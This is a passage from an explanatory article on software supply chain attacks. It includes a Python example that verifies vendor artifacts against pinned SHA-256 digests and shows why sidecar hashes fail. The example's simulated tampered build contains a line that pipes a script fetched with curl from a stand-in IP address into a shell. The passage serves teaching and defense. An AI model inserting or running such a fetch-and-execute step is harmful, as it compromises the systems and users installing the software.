A software supply chain is the web of components that make up the software an organization trusts and installs: the pieces of code used to build operational, communication and network utility programs, as well as common third-party business applications such as word processing, database, spreadsheet and content management software. That code originates from developers all over the globe and is then aggregated and integrated into branded products. This complexity can create significant vulnerability in any company's infrastructure.
Software supply chain attacks typically aim to gain access to sensitive data on the target network, most often for financial gain or to damage a company's reputation. Even if a company has a robust cybersecurity program, a threat actor can reach its network by replacing one of its commonly used tools or office applications with a malicious version at some point between the vendor's build and the installation on the company's network.
As complicated as a software supply chain can become because of its immense number of moving parts, an organization must understand all of its components to protect its network from incoming threats. Attacks on a software supply chain challenge an organization's security posture because vulnerabilities in many of these software programs are difficult to detect, and many organizations simply trust that their vendors are providing secure software. In a recent survey by cybersecurity firm Crowdstrike, 90% of respondents said software supply chain attacks had cost them an average of $1.1 million, yet only 71% of those same respondents held the software vendors in their supply chain to the security standards they set for their own company. This is a huge opportunity for threat actors: they do not have to defeat an organization's own security procedures, only compromise a trusted third party in its supply chain.
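The concrete check a consuming organization can run before installing a vendor artifact is to compare the artifact's digest against one it pinned when it first vetted that release. The following is an added example and not code from the original article; it uses only the Python standard library, and the artifact bytes, the manifest, the file name and the "sidecar hash" scenario are all constructed for illustration. It also shows the failure mode the article's scenario implies: if the expected hash is fetched from the same channel the attacker controls, a tampered build verifies cleanly.

```python
import hashlib
import hmac

# Constructed artifacts (hypothetical): the build the organization vetted, and a
# copy that an attacker has modified somewhere between the vendor and install time.
GOOD_BUILD = b"#!/bin/sh\necho 'vendor tool v1.0'\n"
TAMPERED_BUILD = GOOD_BUILD + b"curl -s http://203.0.113.5/x | sh\n"  # injected stage


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the artifact bytes as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


# Pinned manifest (hypothetical): recorded out of band when the release was vetted,
# mapping artifact name -> approved digest. It lives with the consumer, not the vendor.
PINNED_MANIFEST = {"vendor-tool-1.0.sh": sha256_hex(GOOD_BUILD)}


def verify_artifact(name: str, data: bytes, manifest: dict) -> tuple[bool, str]:
    """Accept an artifact only if its digest equals the digest pinned for that name.

    Returns (ok, reason). Unknown names are rejected rather than trusted by default,
    and the comparison is constant-time so the check itself leaks nothing.
    """
    expected = manifest.get(name)
    if expected is None:
        return False, f"no pinned digest for {name}; refusing unvetted artifact"
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected):
        return False, (f"digest mismatch for {name}: "
                       f"pinned {expected[:16]}..., got {actual[:16]}...")
    return True, "digest matches pinned manifest"


def verify_with_sidecar_hash(data: bytes, sidecar_hash: str) -> bool:
    """The weak pattern: trust a .sha256 file downloaded alongside the artifact.

    An attacker who can replace the artifact on the distribution channel can
    replace the sidecar hash too, so this check passes for the tampered build.
    """
    return hmac.compare_digest(sha256_hex(data), sidecar_hash)


def install_decision(name: str, data: bytes) -> str:
    """What an installer should do with a downloaded artifact: verify, then act."""
    ok, reason = verify_artifact(name, data, PINNED_MANIFEST)
    return "INSTALL" if ok else f"BLOCK ({reason})"


if __name__ == "__main__":
    print("vetted build:  ", install_decision("vendor-tool-1.0.sh", GOOD_BUILD))
    print("tampered build:", install_decision("vendor-tool-1.0.sh", TAMPERED_BUILD))
    print("unknown name:  ", install_decision("vendor-tool-2.0.sh", GOOD_BUILD))
    # The attacker publishes a hash for their own build next to it; the weak check
    # accepts it, which is why the pinned digest must come from a separate channel.
    attacker_sidecar = sha256_hex(TAMPERED_BUILD)
    print("sidecar check on tampered build:",
          verify_with_sidecar_hash(TAMPERED_BUILD, attacker_sidecar))
```

The pinned digest defends against substitution in transit, which is the scenario described above. It does not detect a build that the vendor itself produced from compromised source, because in that case the digest the organization pins is the digest of the malicious build; that case needs review of the vendor's build process rather than of the delivered bytes.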
Until recently, software supply chain attacks were not considered as great a risk as other, more well-known threats like ransomware. Over the past 12 months, however, open-source software supply chain attacks have increased in frequency.
WHAT IS A SOFTWARE SUPPLY CHAIN ATTACK?
Simply put, a software supply chain attack occurs when malicious code is inserted into otherwise legitimate software, usually a trusted application. This application is then distributed, either for an...